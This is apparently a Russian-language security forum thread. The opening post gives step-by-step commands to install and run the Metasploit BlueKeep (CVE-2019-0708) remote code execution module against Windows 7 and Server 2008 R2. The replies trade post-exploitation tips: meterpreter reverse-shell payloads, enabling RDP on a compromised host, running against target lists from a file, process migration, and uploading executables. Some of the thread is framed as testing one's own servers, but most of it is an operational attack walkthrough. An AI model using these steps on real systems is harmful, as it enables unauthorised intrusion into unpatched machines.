Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):
Bash:
cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:
Код:
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

Код:
mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!
 
Последнее редактирование:
В общем, работает exec, у меня был неправильно сконвертирован base64. Но есть одно но. RDP-то работает, но надо перед юзером вводить домен, а он неизвестен, пока ты не попадешь на машину. Но для выполнения каких-то других скриптов это очень даже годная тема.
 
Привет всем))) Использую для тестов Armitage , но у него по умолчанию payload generic/shell_reverse_tcp , хочу изменить на payload windows/x64/meterpreter/reverse_tcp . Но в настройках Armitage так и не нашёл , гугл также не помог )))) Может кто знает, подскажите. СПС.
 
Привет всем))) Использую для тестов Armitage , но у него по умолчанию payload generic/shell_reverse_tcp , хочу изменить на payload windows/x64/meterpreter/reverse_tcp . Но в настройках Armitage так и не нашёл , гугл также не помог )))) Может кто знает, подскажите. СПС.
Там где-то есть в свойствах эксплоита. Я как-то там менял, когда тоже в Armitage делал. У меня программы нет, поэтому скриншот не могу показать.
 
Там где-то есть в свойствах эксплоита. Я как-то там менял, когда тоже в Armitage делал. У меня программы нет, поэтому скриншот не могу показать.
Блин (((( Хотелось бы поточнее где. Я уже всю прогу перерыл. (((
 
Подскажите команды в meterpreter для создание RDP подключения. Спасибо.
Насколько мне известно, в meterpreter нельзя создать RDP-подключение. Для этого вам нужен RDP-клиент, например, remmina в Linux или remote desktop connection в Windows.
А вот активировать RDP в meterpreter можно так:
run post/windows/manage/enable_rdp
 
Насколько мне известно, в meterpreter нельзя создать RDP-подключение. Для этого вам нужен RDP-клиент, например, remmina в Linux или remote desktop connection в Windows.
А вот активировать RDP в meterpreter можно так:
run post/windows/manage/enable_rdp
Подскажите , я запустил set RHOSTS file:xxx , по итогу "session 3 created in the background" . Как к ним подключиться ?
 
  • Нравится
Реакции: Nimnul
скинте ссылочку на онлайн-справку. Спасибо.

Кстати, вот этот способ с запуском работать хоть и будет, но недолго. Лучше запускать от пользователя, а не от системы. Для этого есть команда migrate.
 
Подскажите , а куда команда upload ( в какую директорию ) загружает файл file.exe . ???
В папку, куда вы сперва попадаете, когда запускаете сессию.
Её вы можете узнать с помощью команды pwd. Это папка C:\Windows\System32. В этой папке иногда нельзя запустить файл. Поэтому лучше поменяйте папку:
cd %temp%
 
В папку, куда вы сперва попадаете, когда запускаете сессию.
Её вы можете узнать с помощью команды pwd. Это папка C:\Windows\System32. В этой папке иногда нельзя запустить файл. Поэтому лучше поменяйте папку:
cd %temp%
Так прописать : upload file.exe C:\\Windows\ \cd %temp% ????
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!